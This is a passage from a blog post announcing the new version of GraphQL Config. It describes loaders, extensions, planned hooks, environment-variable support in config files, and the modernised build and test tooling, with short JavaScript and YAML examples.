It also simplifies the codebase of GraphQL tools as they don’t need to take care of that work themselves anymore.
export const RelayLoader = { loaderId() { return 'relay-loader'; }, canLoad(pointer) { return isReactFile(pointer); }, load(pointer) { const document = extractDocument(pointer); return new Source({ location: pointer, document, }); }, };
We maintain a few loaders but we believe the community will start to cover other use cases as well.
All platforms
Our goal is to make GraphQL Config platform agnostic.
The old version relied heavily on Node’s file system, which is a blocker in many cases.
Loader fits here perfectly.
Because it’s just an asynchronous function that receives an input and gives back a GraphQL Schema, it should work fine in browser and in any other environment.
Extensions
In the previous generation of GraphQL Config
extensions namespace, there was a way to pass custom information to the consumers of the config file, like libraries and IDE extensions.
We believe
extensions should actually extend GraphQL Config’s behavior.
Take for example loaders. Imagine you want to collect operations and fragments from your Relay project. With the new GraphQL Config, you can write a loader and register it through a Relay Extension.
const RelayExtension = (api) => { api.loaders.documents.register(RelayLoader); return { name: 'relay', }; };
The new
extensions allows you to turn GraphQL Config into something fully customizable and to be used in tools like Webpack!
Hooks
We believe that there’s a need to intercept the schema building process or to simply validate the config.
It’s not currently available but with your help and suggestions we could make it happen.
Environment Variables
In the new GraphQL Config, we’ve decided to support environment variables. It was a long time hanging and highly requested issue. Now the usage in JS config file is straightforward. It’s also very easy to use environment variables in YAML and JSON files.
schema: './schema.graphql' include: ${INCLUDE_GLOB}
Every
${ENV_VAR} in the config file is replaced with the actual value. We also allow for defaults. Using
${ENV_VAR:foo} results in
foo.
Easier to contribute
We also wanted to make the codebase itself easy to understand and contribute to.
Our first task was to bring the repository back to life by updating the build and test setup.
The
graphql-config package now ships with CommonJS and ES Modules thanks to Rollup and TypeScript. Tests are done thanks to Jest. The codebase stays consistent because of Prettier and ESLint on top.
We also migrated from Travis to GitHub Actions and run tests on Node 8, 10 and 12.
To keep dependencies always up to date and to make sure no new release breaks GraphQL Config’s logic, we decided to use Dependabot.
We also addressed more than 70% of the issues and open PRs (and the remaining are waiting for feedback).
Start using it today!
Even though we are in an alpha phase, If you’re the author or maintainer of a GraphQL library or another related tool, we encourage you to adopt the GraphQL Config standard.
Please link to this GitHub issue to track the progress.
If you have a project that use those tools, we encourage you to try it out in your current project.
We will support and answer all your questions on Github and on our Discord channel. | https://the-guild.dev/blog/graphql-config | CC-MAIN-2021-31 | refinedweb | 1,467 | 60.95 |
With Python module from the standard library known to not work within the sandbox restrictions.
The App Engine platform provides many services that your code can call. Your application can also configure scheduled tasks that run at specified intervals.
The Python Getting Started Guide provides an interactive introduction to developing web applications with Python and App Engine.
Selecting the Python 2 runtime
You specify the Python runtime environment in the
app.yaml configuration file,
which is used to deploy your application to App Engine. For example, you
add the following to the
app.yaml file to use
Python version 2.7: the
app.yaml file and how to deploy your app to App
Engine, see the
app.yaml Reference,
Migrating to Python 2.7,
and Deploying a Python App
topics.
The sandboxTo allow App Engine to distribute requests for applications across multiple web servers, and to prevent one application from interfering with another, the application runs in a restricted "sandbox" environment. In this environment, the application can execute code, store and query the data in Datastore, use the App Engine mail, URL fetch and users services, and examine the user's web request and prepare the response.
An App Engine application cannot:
write to the filesystem. Applications must use. You must override the
skip_fileselement in your
app.yamlfile.
Pure Python 2 version 2.7
In the Python version version 2.7 runtime includes several third-party libraries.
Adding Third Party Python Libraries
You can include third party Python libraries with your application by putting the code in your application directory. If you make a symbolic link to a library's directory in your application directory, that link is followed and the library gets included in the app that you deploy to App Engine.
The include path of the Python module includes your application's root
directory, which is the directory containing the
app.yaml file. Python modules
that you create in your application's root directory are available using a path
from the root. Don't forget to create the required
__init__.py files in your
sub-directories so that Python recognizes those sub-directories as packages.
Also ensure that your libraries do not need any C extensions.
Threads
Threads can be created in Python version 2.7 using the
thread or
threading modules. Note that threads will be joined by the runtime
when the request ends so the threads cannot run past the end of the request.
Background threads
Code running on an instance with manual or basic scaling can start a background thread that can outlive the request that spawns it. This allows an instance to perform arbitrary periodic or scheduled tasks, or to continue working in the background after a request has returned to the user.
A background thread's
os.environ and logging entries are independent of those
of the spawning thread.
You must import the
google.appengine.api.background_thread module from the SDK
for App Engine.
from google.appengine.api import background_thread
The
BackgroundThread
class is like the regular Python
threading.Threadclass, but can "outlive" the
request that spawns it. There is also function
start_new_background_thread()
which creates a background thread and starts it:
# sample function to run in a background thread def change_val(arg): global val val = arg if auto: # Start the new thread in one command background_thread.start_new_background_thread(change_val, ['Cat']) else: # create a new thread and start it t = background_thread.BackgroundThread( target=change_val, args=['Cat']) t.start()
Tools
The SDK for App Engine includes tools for testing your application, uploading your application files, managing Datastore indexes, downloading log data, and uploading large amounts of data to the Datastore.
The development server runs your application on your local computer for testing your application. The server simulates the Datastore services and sandbox restrictions. The development server can also generate configuration for Datastore indexes based on the queries the app performs during testing.
The
gcloud tool
handles all command-line interaction with your application running on App
Engine. You use
gcloud app deploy to upload your application to
App Engine, or to update individual configuration files like the
Datastore index configuration, which allows you to build new
indexes before deploying your code. You can also view your.
Python version 2.7. | https://cloud.google.com/appengine/docs/standard/python/runtime?hl=da | CC-MAIN-2020-40 | refinedweb | 704 | 57.67 |
This page is a snapshot from the LWG issues list, see the Library Active Issues List for more information and the meaning of C++17 status.
Section: 19.3 [assertions] Status: C++17 Submitter: Daniel Krügler Opened: 2013-01-12 Last modified: 2017-07-30
Priority: 2
View other active issues in [assertions].
View all other issues in [assertions].
View all issues with C++17 status.
Discussion:
It is unclear from the current specification whether assert() expressions can be used in (potential) constant expressions. As an example consider the implementation of a constexpr function:
#include <cassert> template<class T, unsigned N> struct array { T data[N]; constexpr const T& operator[](unsigned i) const { return assert(i < N), data[i]; } }; int main() { constexpr array<int, 3> ai = {1, 2, 3}; constexpr int i = ai[0]; int j = ai[0]; // constexpr int k = ai[5]; }
The first question is whether this program is guaranteed well-formed? A second question is whether is would guaranteed to be ill-formed, if we uncomment the last code line in main()?
The wording in 19.3 [assertions] doesn't add anything significant to the C99 wording. From the C99 specification (7.2 p1 and 7.2.1.1 p2) we get already some valuable guarantees:
The expression assert(e) is a void expression for all expressions e independent of the definition of NDEBUG.
If NDEBUG is defined, assert(e) is equivalent to the expression void() (or anything that cannot be distinguished from that).
The current wording does not yet guarantee that assert expressions can be used in constant expressions, but all tested implementations (gcc, MSVC) would already support this use-case. It seems to me that this should be possible without giving assert a special meaning for the core language.As a related comment it should be added, that there is a core language proposal that intents to relax some current constraints for constexpr functions and literal types. The most interesting one (making void a literal types and allowing for expression-statements) would simplify the motivating example implementation of operator[] to:
constexpr const T& operator[](unsigned i) const { assert(i < N); return data[i]; };
[2013-03-15 Issues Teleconference]
Moved to Open.
We are still gaining experience with constexpr as a language feature, and there may be work in Evolution that would help address some of these concerns. Defer discussion until we have a group familiar with any evolutionary direction.
[2014-06-08, Daniel comments and suggests wording]
After approval of N3652, void is now a literal type and constexpr functions can contain multiple statements, so this makes the guarantee that assert expressions are per-se constexpr-friendly even more relevant. A possible wording form could be along the lines of:
For every core constant expression e of scalar type that evaluates to true after being contextually converted to bool, the expression assert(e) shall be a prvalue core constant expression of type void.
Richard Smith pointed out some weaknesses of this wording form, for example it would not guarantee to require the following example to work:
constexpr void check(bool b) { assert(b); }
because b is not a core constant expression in this context.He suggested improvements that lead to the wording form presented below (any defects mine).
[Lenexa 2015-05-05]
MC : ran into this
Z : Is it guaranteed to be an expression?
MC : clarifies that assert runs at runtime, not sure what it does at compile time
STL : c standard guarantees its an expression and not a whole statement, so comma chaining it is ok
HH : Some implementations work as author wants it to
STL : also doing this as constexpr
DK/STL : discussing how this can actually work
HH : GCC 5 also implements it. We have implementor convergence
MC : Wants to do this without giving assert a special meaning
STL : NDEBUG being defined where assert appears is not how assert works. This is bug in wording. Should be "when assert is defined" or something like that. ... is a constant subexpression if NDEBUG is defined at the point where assert is last defined or redefined."
Would like to strike the "either" because ok if both debug or assertion is true. We want inclusive-or here
MC : is redefined needed?
STL : my mental model is its defined once and then redefined
HH : wants to up to P2
Z/STL : discussing how wording takes care of how/when assert is defined/redefefined
STL/WB : discussing whether to move to ready or review. -> Want to move it to ready.
ask for updated wording
p3 -> p2
plan to go to ready after checking wording
[Telecon 2015-06-30]
HH: standardizing existing practice
MC: what about the comment from Lenexa about striking "either"?
HH: all three implementations accept it
MC: update issue to strike "either" and move to Tentatively Ready
Proposed resolution:
This wording is relative to N3936.Previous resolution [SUPERSEDED]:
-: | https://cplusplus.github.io/LWG/issue2234 | CC-MAIN-2019-22 | refinedweb | 812 | 50.06 |
One way to partition the space of all possible $k$-mers is by minimal $l$-mer, where $l < k$. For example, the minimal 2-mer in the string
ABC is
AB and the minimal 4-mer in the string
abracadabra is
abra. In this context, the minimal $l$-mer is called a minimizer, and we'll call such a partitioning scheme a $k, l$-minimizing scheme.
def string_to_kmers(s, length): return [s[i:i+length] for i in xrange(len(s)-length+1)] def minimizer(k, l): """ Given k-mer, return its minimal l-mer """ assert l <= k return min(string_to_kmers(k, l))
minimizer('ABC', 2)
'AB'
minimizer('abracadabra', 4)
'abra'
But if our goal is to partition the space of $k$-mers, couldn't we use a hash function instead? Say $k$ is 10 and $l$ is 4. A 10,4-minimizing scheme is a way for dividing the space of $4^{10}$ 10-mers (a million or so) into $4^4 = 256$ partitions. We can accomplish this with a hash function that maps $k$-mers to integers in $[0, 255]$. Why would we prefer minimizers over hash functions?
The answer is that two strings that share long substrings tend to have the same minimizer, but not the same hash value. For example, the strings
abracadabr and
bracadabra have the substring
bracadabr in common, and they have the same minimal 4-mer:
minimizer('abracadabr', 4), minimizer('bracadabra', 4)
('abra', 'abra')
But their hash values (modulo 256) are not the same:
# you might need to 'pip install mmh3' first import mmh3 mmh3.hash('abracadabr') % 256, mmh3.hash('bracadabra') % 256
(26, 224)
A feature of hash functions is that they divide the 10-mers quite uniformly (evenly) among the 256 buckets. 10,4-minimzers divide them much less uniformly. This becomes clear when you consider that, given a random 10-mer, the 4-mer
TTTT is very unlikely to be its minimizer, whereas the 4-mer
AAAA is much more likely.
We can also show this empirically by partitioning a collection of random 10-mers:
import random random.seed(629) def random_kmer(k): return ''.join([random.choice('ACGT') for _ in xrange(k)])
%matplotlib inline import matplotlib.pyplot as plt def plot_counts(counter, title=None): idx = range(256) cnts = map(lambda x: counter.get(x, 0), idx) plt.bar(idx, cnts, ec='none') plt.xlim(0, 256) plt.ylim(0, 35) if title is not None: plt.title(title) plt.show()
from collections import Counter # hash 1000 random 10-mers cnt = Counter([mmh3.hash(s) % 256 for s in [random_kmer(10) for _ in xrange(1000)]]) plot_counts(cnt, 'Frequency of partitions using hash mod 256')
def lmer_to_int(mer): """ Maps AAAA to 0, AAAC to 1, etc. Works for any length argument. """ cum = 0 charmap = {'A':0, 'C':1, 'G':2, 'T':3} for c in mer: cum *= 4 cum += charmap[c] return cum
# get minimal 4-mers from 1000 random 10-mers cnt = Counter([lmer_to_int(minimizer(s, 4)) for s in [random_kmer(10) for _ in xrange(1000)]]) plot_counts(cnt, 'Frequency of partitions using minimal 4-mer; AAAA at left, TTTT at right') | http://nbviewer.jupyter.org/github/BenLangmead/comp-genomics-class/blob/master/notebooks/Minimizers.ipynb | CC-MAIN-2018-51 | refinedweb | 522 | 63.09 |
IntroductionEdit
The .NET framework consists of several languages, all which follow the "object orientated programming" (OOP) approach to software development. This standard defines that all objects support
- Inheritance - the ability to inherit and extend existing functionality.
- Encapsulation - the ability to allow the user to only see specific parts, and to interact with it in specific ways.
- Polymorphism - the ability for an object to be assigned dynamically, but with some predictability as to what can be done with the object.
Objects are synonymous with objects in the real world. Think of any object and think of how it looks and how it is measured and interacted with. When creating OOP languages, the reasoning was that if it mimics the thought process of humans, it would simplify the coding experience.
For example, let's consider a chair, and its dimensions, weight, colour and what is it made out of. In .NET, these values are called "Properties". These are values that define the object's state. Be careful, as there are two ways to expose values: Fields and Properties. The recommended approach is expose Properties and not fields.
So we have a real-world idea of the concept of an object. In terms of practicality for a computer to pass information about, passing around an object within a program would consume a lot of resources. Think of a car, how many properties that has - 100's, 1000's. A computer passing this information about all the time will waste memory, processing time and therefore a bad idea to use. So objects come in two flavours:
- Reference types
- Value types
Reference and Value TypesEdit
A reference type is like a pointer to the value. Think of it like a piece of paper with a street address on it, and the address leads to your house - your object with hundreds of properties. If you want to find it, go to where the address says! This is exactly what happens inside the computer. The reference is stored as a number, corresponding to somewhere in memory where the object exists. So instead of moving an object around - like building a replica house every time you want to look at it - you just look at the original.
A value type is the exact value itself. Values are great for storing small amounts of information: numbers, dates etc.
There are differences in the way they are processed, so we will leave that until a little later in the article.
As well as querying values, we need a way to interact with the object so that some operation can be performed. Think of files - it's all well and good knowing the length of the file, but how about Read()'ing it? Therefore, we can use something called methods as a way of performing actions on an object.
An example would be a rectangle. The properties of a rectangle are:
- Length
- Width
The "functions" (or methods in .NET) would be:
- Area (= Length*Width)
- Perimeter (= 2*Length + 2*Width)
Methods vary from Properties because they require some transformation of data to achieve a result. Methods can either return a result (such as Area) or not. Like above with the chair, if you Sit() on the chair, there is no expected reaction, the chair just ... works!
System.ObjectEdit
To support the first rule of OOP - Inheritance, we define something that all objects will derive from - this is System.Object, also known as Object or object. This object defines some methods that all objects can use should they need to. These methods include:
- GetHashCode() - retrieve a number unique to that object.
- GetType() - retrieves information about the object like method names, the objects name etc.
- ToString() - convert the object to a textual representation - usually for outputting to the screen or file.
Since all objects derive from this class (whether you define it or not), any class will have these three methods ready to use. Since we always inherit from System.Object, or a class that itself inherits from System.Object, we therefore enhance and/or extend its functionality. Like in the real world that humans, cats, dogs, birds, fish are all an improved and specialised version of an "organism".
Object basicsEdit
All objects by default are reference types. To support value types, objects must instead inherit from the System.ValueType abstract class, rather than System.Object.
ConstructorsEdit
When objects are created, they are initialized by the "constructor". The constructor sets up the object, ready for use. Because objects need to be created before being used, the constructor is created implicitly, unless it is defined differently by the developer. There are 3 types of constructor:
- Copy Constructor
- Static Constructor
- Default constructor - takes no parameters.
- Overloaded constructor - takes parameters.
Overloaded constructors automatically remove the implicit default constructor, so a developer must explicitly define the default constructor, if they want to use it.
A constructor is a special type of method in C# that allows an object to initialize itself when it is created. If a constructor method is used, there is no need to write a separate method to assign initial values to the data members of an object.
Important characteristics of a constructor method:
- A constructor method has the same name as the class itself.
- A constructor method is usually declared as public.
- Constructor method is declared as public because it is used to create objects from outside the class in which it is declared. We can also declare a constructor method as private, but then such a constructor cannot be used to create objects.
- Constructor methods do not have a return type (not even void).
- C# provides a default constructor to every class. This default constructor initializes the data members to zero. But if we write our own constructor method, then the default constructor is not used.
- A constructor method is used to assign initial values to the member variables.
- The constructor is called by the new keyword when an object is created.
- We can define more than one constructor in a class. This is known as constructor overloading. All the constructor methods have the same name, but their signatures are different, i.e., number and type of parameters are different.
- If a constructor is declared, no default constructor is generated.
Copy ConstructorEdit
A copy constructor creates an object by copying variables from another object. The copy constructor is called by creating an object of the required type and passing it the object to be copied.
In the following example, we pass a Rectangle object to the Rectangle constructor so that the new object has the same values as the old object.
using System; namespace CopyConstructor { class Rectangle { public int length; public int breadth; public Rectangle(int x, int y) // constructor fn { length = x; breadth = y; } public Rectangle(Rectangle r) { length = r.length; breadth = r.breadth; } public void display() { Console.WriteLine("Length = " + length); Console.WriteLine("Breadth = " + breadth); } } // end of class Rectangle class Program { public static void Main() { Rectangle r1 = new Rectangle(5, 10); Console.WriteLine("Values of first object"); r1.display(); Rectangle r2 = new Rectangle(r1); Console.WriteLine("Values of second object"); r2.display(); Console.ReadLine(); } } }
Static ConstructorEdit
A static constructor is first called when the runtime first accesses the class. Static variables are accessible at all times, so the runtime must initialize it on its first access. The example below, when stepping through in a debugger, will show that static MyClass() is only accessed when the MyClass.Number variable is accessed.
C# supports two types of constructors: static constructor and instance constructor. Whereas an instance constructor is called every time an object of that class is created, the static constructor is called only once. A static constructor is called before any object of the class is created, and is usually used to initialize any static data members of a class.
A static constructor is declared by using the keyword static in the constructor definition. This constructor cannot have any parameters or access modifiers. In addition, a class can only have one static constructor. For example:
using System; using System.Collections.Generic; using System.Text; namespace StaticConstructors { class Program { static void Main(string[] args) { int i = 0; int j = 0; Console.WriteLine("Static Number = " + MyClass.Number); } } class MyClass { private static int _number; public static int Number { get { return _number; } } static MyClass() { Random r = new Random(); _number = r.Next(); } } }
Default ConstructorEdit
The default constructor takes no parameters and is implicitly defined, if no other constructors exist. The code sample below show the before, and after result of creating a class.
// Created by the developer class MyClass { } // Created by the compiler class MyClass : System.Object { public MyClass() : base() { } }
Overloaded ConstructorsEdit
To initialize objects in various forms, the constructors allow customization of the object by passing in parameters.
class MyClass { private int _number; public int Number { get { return _number; } } public MyClass() { Random randomNumber = new Random(); _number = randomNumber.Next(); } public MyClass(int seed) { Random randomNumber = new Random(seed); _number = randomNumber.Next(); } }
Calling other constructorsEdit
To minimise code, if another constructor implements the functionality better, you can instruct the constructor to call an overloaded (or default) constructor with specific parameters.
class MyClass { private int _number; public int Number { get { return _number; } } public MyClass() : this ( DateTime.Now.Milliseconds ) // Call the other constructor passing in a value. { } public MyClass(int seed) { Random r = new Random(seed); _number = r.Next(); } }
Base classes constructors can also be called instead of constructors in the current instance
class MyException : Exception { private int _number; public int Number { get { return _number; } } public MyException ( int errorNumber, string message, Exception innerException) : base( message, innerException ) { _number = errorNumber; } }
DestructorsEdit
As well as being "constructed", objects can also perform cleanup when they are cleared up by the garbage collector. As with constructors, the destructor also uses the same name as the class, but is preceded by the tilde (~) sign. However, the garbage collector only runs when either directly invoked, or has reason to reclaim memory, therefore the destructor may not get the chance to clean up resources for a long time. In this case, look into use of the Dispose() method, from the IDisposable interface.
Destructors are recognised via the use of the ~ symbol in front of a constructor with no access modifier. For example:
class MyException : Exception { private int _number; public int Number { get { return _number; } } public MyException ( int errorNumber, string message, Exception innerException) : base( message, innerException ) { _number = errorNumber; } ~MyException() { } } | http://en.m.wikibooks.org/wiki/C_Sharp_Programming/Objects | CC-MAIN-2013-48 | refinedweb | 1,719 | 56.35 |
Copy Features (Data Management)
Summary
Copies features from the input feature class or layer to a new feature class. If the input is a layer which has a selection, only the selected features will be copied. If the input is a geodatabase feature class or shapefile, all features will be copied.
Usage
Both the geometry and attributes of the Input Features will be copied to the output feature class.
This tool can be used for data conversion as it can read many feature formats (any you can add to ArcMap) and write these to shapefile or geodatabase (File, Personal, or ArcSDE).
Syntax
Code Sample
The following Python window script demonstrates how to use the CopyFeatures tool in immediate mode.
import arcpy from arcpy import env env.workspace = "C:/data" arcpy.CopyFeatures_management("climate.shp", "C:/output/output.gdb/climate")
The following stand-alone script demonstrates how to use CopyFeatures to copy the shapefiles in a folder to a file geodatabase.
# Name: CopyFeatures_Example2.py # Description: Convert all shapefiles in a folder to geodatabase feature classes # Requirements: os module # Import system modules import arcpy from arcpy import env import os # Set environment settings env.workspace = "C:/data" # Set local variables outWorkspace = "c:/output/output) | http://help.arcgis.com/en/arcgisdesktop/10.0/help/0017/001700000035000000.htm | CC-MAIN-2017-09 | refinedweb | 201 | 54.32 |
OK, this is an example of a class that implements overloaded operators to appear as built in type. We’ll define a currency class that allows you to store the type of currency and can convert between different currencies. This is a simple example of the type of Python assignment help we can offer.
Here is the skeletal class will be extending, it has 2 currencies, feel free to add more.
from decimal import Decimal
_CURRENCIES = {“USD”: “${:.2f}”,
“GBP”: “\u00a3{:.2f}”}
class Currency():
def __init__(self, amount = 0, currency = “GBP”):
self.amount = Decimal(amount)
self.currency = currency
def __str__(self):
return _CURRENCIES.get(self.currency).format(self.amount)
def main():
price = Currency(16.75)
print(price)
if __name__ == “__main__”:
main()
This code creates a cost object and displays it, to make it useful we want to be able to add currencies together and to multiply the price by an amount.
We want to allow the following.
def main():
price = Currency(16.75)
cost = price * 5
taxes = cost * 0.20
total = cost + taxes
print(total)
If you run the code you will get an error message.
Traceback (most recent call last):
File “C:/course/social/Currency.py”, line 24, in <module>
main()
File “C:/course/social/Currency.py”, line 17, in main
cost = price * 5
TypeError: unsupported operand type(s) for *: ‘Currency’ and ‘int’
So we need to allow the multiply and the add. So add the following code to the class.
def __mul__(self, other):
return Currency(self.amount * Decimal(other), self.currency)
def __add__(self, other):
return Currency(self.amount + other.amount)
And that works perfectly, lets extend it so that we can convert between currencies, add the following.
print(total)
dollars = total.to(“USD”)
pounds = dollars.to(“GBP”)
print(dollars, pounds)
def to(self, currency):
if self.currency == currency:
return self
return Currency(self.amount * _RATES[self.currency, currency], currency)
_RATES = {(“USD”, “GBP”) : Decimal(1/1.3),
(“GBP”, “USD”) : Decimal(1.3)}
This allows you to convert rates on the fly, so the one thing we have remaining would be to add pounds and dollars together. If you try it at the moment, the total will be incorrect since it won’t take the rate into account.
incorrect = dollars + pounds
print(incorrect)
£231.15
So we need to change the add method, so that if the currencies are not the same, it uses the first currency as the currency to use.
def __add__(self, other):
if self.currency == other.currency:
return Currency(self.amount + other.amount, self.currency)
return Currency(self.amount + other.to(self.currency).amount, self.currency)
Now the output is $261.30 which is correct. We could add further changes, but this at least illustrates the mathematics operators. We might want to implement the comparisons so we can sort, and so we will add that.
prices = [Currency(10), Currency(5), Currency(20)]
print(sorted(prices))
This gives an error TypeError: unorderable types: Currency() < Currency(), so lets add that.
def __lt__(self, other):
return self.amount < other.amount
def __repr__(self):
return str(self)
The repr is so that print [] works correctly.
This could be extended further to update the currency rates automatically each day, Python homework help could extend this for you if you wish. Look at the site on a regular basis for more example projects.
This code is presented by and copyright Programming Assignment Experts but license is granted to extend and use in any project as long as this message is included. | https://www.programmingassignmentexperts.com/blog/how-to-write-a-custom-class-in-python/ | CC-MAIN-2019-26 | refinedweb | 580 | 60.51 |
When an attempt is made to add a namespace node to an
element, and the namespace node uses a prefix that is
already in use for the element name, but with a
different URI, Saxon reports an error. For example,
with Saxon 7.2, the following fails:
<ns:e xmlns:
<xsl:namespacenstwo.uri</xsl:namespace>
</ns:e>
The same failure occurs in Saxon 6.5.2, if the
namespace node is created using <xsl:copy/> or
<xsl:copy-of/>.
This should not fail, because technically according to
the specification, a prefix for the element name is
only created at serialization time (or namespace fixup
time in XSLT 2.0), in other words no prefix for element
<{nsone.uri}e> should be allocated until the namespace
node has been successfully created.
The error message is "Cannot create two namespace nodes
with the same name".
Applies to 7.2, 6.5.2, and all earlier releases.
Test cases: nspc39, nspc40
Michael Kay
2002-11-12
Logged In: YES
user_id=251681
The example is incorrect, because literal result elements
are required to copy their namespace nodes. The following
example illustrates the problem with 6.5.2:
<xsl:element
<xsl:copy-of
</xsl:element>
Here the "ns" prefix in xsl:element is only a suggested
prefix, it should not be used in the result tree until it is
known that the prefix is not being used for a different purpose.
Source code fixed in 7.x branch.
A fix for 6.5.x will be more difficult and I might not
attempt it: it isn't worth risking destabilising the code
for such an obscure problem.
Michael Kay
2002-11-18
Logged In: YES
user_id=251681
Fixed in 7.3 | http://sourceforge.net/p/saxon/bugs/103/ | CC-MAIN-2014-42 | refinedweb | 286 | 65.83 |
Perform this procedure to configure a new cluster by using an XML cluster configuration file. The new cluster can be a duplication of an existing cluster that runs Sun Cluster 3.2 software.
This procedure configures the following cluster components:
Cluster name 3.2 software and patches are installed on each node that you will configure. See How to Install Sun Cluster Framework and Data-Service Software Packages.
Ensure that Sun Cluster 3.2 software is not yet configured on each potential cluster node.
Become superuser on a potential node that you want to configure in the new cluster.
Determine whether Sun Cluster 3.2 software is already configured on the potential node.
If the command returns the following message, proceed to Step c.
This message indicates that Sun Cluster software is not yet configured on the potential node.
If the command returns the node ID number, do not perform this procedure.
The return of a node ID indicates that Sun Cluster software is already configured on the node.
If the cluster is running an older version of Sun Cluster software and you want to install Sun Cluster 3.2 software, instead perform upgrade procedures in Chapter 8, Upgrading Sun Cluster Software.
Repeat Step a and Step b on each remaining potential node that you want to configure in the new cluster.
If Sun Cluster 3.2 software is not yet configured on any of the potential cluster nodes, proceed to Step 2.
If you are duplicating an existing cluster than runs Sun Cluster 3.2 software, use a node in that cluster to create a cluster configuration XML file.
Become superuser on an active member of the cluster that you want to duplicate.
Export the existing cluster's configuration information to a file.
Specifies the output destination.
The name of the cluster configuration XML file. The specified file name can be an existing file or a new file that the command will create.
For more information, see the cluster(1CL) man page.
Copy the configuration file to the potential node from which you will configure the new cluster.
You can store the file in any directory that is accessible to the other hosts that you will configure as cluster nodes.
Become superuser on the potential node from which you will configure the new cluster.
Modify the cluster configuration XML file as needed.
Open your cluster configuration XML file for editing.
If you are duplicating an existing cluster, open the file that you created with the cluster export command.
If you are not duplicating an existing cluster, create a new file.
Base the file on the element hierarchy that is shown in the clconfiguration(5CL) man page. You can store the file in any directory that is accessible to the other hosts that you will configure as cluster nodes.
Modify the values of the XML elements to reflect the cluster configuration that you want to create.
To establish a cluster, the following components must have valid values in the cluster configuration XML file:
Cluster name
Cluster nodes
Cluster transport
The cluster is created with the assumption that the partition /globaldevices exists on each node that you configure as a cluster node. The global-devices namespace is created on this partition. If you need to use a different file-system name on which to create the global devices, add the following property to the <propertyList> element for each node that does not have a partition that is named /globaldevices.
If you are modifying configuration information that was exported from an existing cluster, some values that you must change to reflect the new cluster, such as node names, are used in the definitions of more than one cluster object.
See the clconfiguration(5CL) man page for details about the structure and content of the cluster configuration XML file.
Validate the cluster configuration XML file.
See the xmllint(1) man page for more information.
From the potential node that contains the cluster configuration XML file, create the cluster.
Specifies the name of the cluster configuration XML file to use as the input source.
For the Solaris 10 OS, verify on each node that multi-user services for the Service Management Facility (SMF) are online.
If services are not yet online for a node, wait until the state becomes online before you proceed to the next step.
On one node, become superuser.
Verify that all nodes have joined the cluster.
Output resembles the following.
For more information, see the clnode(1CL) man page.
Install any necessary patches to support Sun Cluster software, if you have not already done so.
See Patches and Required Firmware Levels in Sun Cluster 3.2 Release Notes for Solaris OS for the location of patches and installation instructions..
To duplicate quorum information from an existing cluster, configure the quorum device by using the cluster configuration XML file.
You must configure a quorum device if you created a two-node cluster. If you choose not to use the cluster configuration XML file to create a required quorum device, go instead to How to Configure Quorum Devices.
If you are using a quorum server for the quorum device, ensure that the quorum server is set up and running.
Follow instructions in Sun Cluster Quorum Server User’s Guide.
If you are using a Network Appliance NAS device for the quorum device, ensure that the NAS device is set up and operational.
Observe the requirements for using a NAS device as a quorum device.
See Requirements, Recommendations, and Restrictions for Network Appliance NAS Devices in Sun Cluster 3.1 - 3.2 With Network-Attached Storage Devices Manual for Solaris OS.
Follow instructions in your device's documentation to set up the NAS device.
Ensure that the quorum configuration information in the cluster configuration XML file reflects valid values for the cluster that you created.
If you made changes to the cluster configuration XML file, validate the file.
Configure the quorum device.
Specifies the name of the device to configure as a quorum device.
Remove the cluster from installation mode.
.
The following example duplicates the cluster configuration and quorum configuration of an existing two-node cluster to a new two-node cluster. The new cluster is installed with the Solaris 10 OS and is not configured with non-global zones. The cluster configuration is exported from the existing cluster node, phys-oldhost-1, to the cluster configuration XML file clusterconf.xml. The node names of the new cluster are phys-newhost-1 and phys-newhost-2. The device that is configured as a quorum device in the new cluster is d3.
The prompt name phys-newhost-N in this example indicates that the command is performed on both cluster nodes..
Go to How to Verify the Quorum Configuration and Installation Mode.
After the cluster is fully established, you can duplicate the configuration of the other cluster components from the existing cluster. If you did not already do so, modify the values of the XML elements that you want to duplicate to reflect the cluster configuration you are adding the component to. For example, if you are duplicating resource groups, ensure that the <resourcegroupNodeList> entry contains the valid node names for the new cluster, and not the node names from the cluster that you duplicated unless the node names are the same.
To duplicate a cluster component, run the export subcommand of the object-oriented command for the cluster component that you want to duplicate. For more information about the command syntax and options, see the man page for the cluster object that you want to duplicate. The following table lists the cluster components that you can create from a cluster configuration XML file after the cluster is established and the man page for the command that you use to duplicate the component.
This table. | http://docs.oracle.com/cd/E19787-01/819-2970/gcpqe/index.html | CC-MAIN-2014-15 | refinedweb | 1,301 | 56.05 |
16 August 2013 15:54 [Source: ICIS news]
HOUSTON (ICIS)--Demand has not changed for US acrylonitrile (ACN), but spot prices are expected to rise by about $100/tonne (€75/tonne) over the next few weeks on tight supply due to turnarounds, sources said on Friday.
The price rise comes at a good time for producers who are dealing with a 5 cent/lb ($110/tonne) rise in the price of key feedstock propylene.
Sources said Unigel ?xml:namespace>
The plant, which is a joint venture between Unigel and Pemex Petroquimica, was shut down for about six weeks earlier this year for routine maintenance and restarted in mid-April. The facility, in the Morelos petrochemical complex in
The Unigel shutdown will now likely overlap with an INEOS Nitriles turnaround at its
The two shutdowns are expected to reduce supply for a few weeks in late August and early September and cause spot prices to rise by about $100/tonne, sources said.
One producer said it welcomed the price rise to help it cope with the rise in the cost of propylene.
"Without the turnarounds, we couldn't raise prices to counter the rise in propylene," the source said. "The demand is just not there. But this will give us a chance to at least make up some of the margins we're losing on the rise in propylene."
Major producers of US ACN include Ascend Performance Materials, Cornerstone Energy and | http://www.icis.com/Articles/2013/08/16/9698363/us-acn-spot-prices-set-to-rise-amid-turnarounds-sources.html | CC-MAIN-2014-15 | refinedweb | 240 | 65.15 |
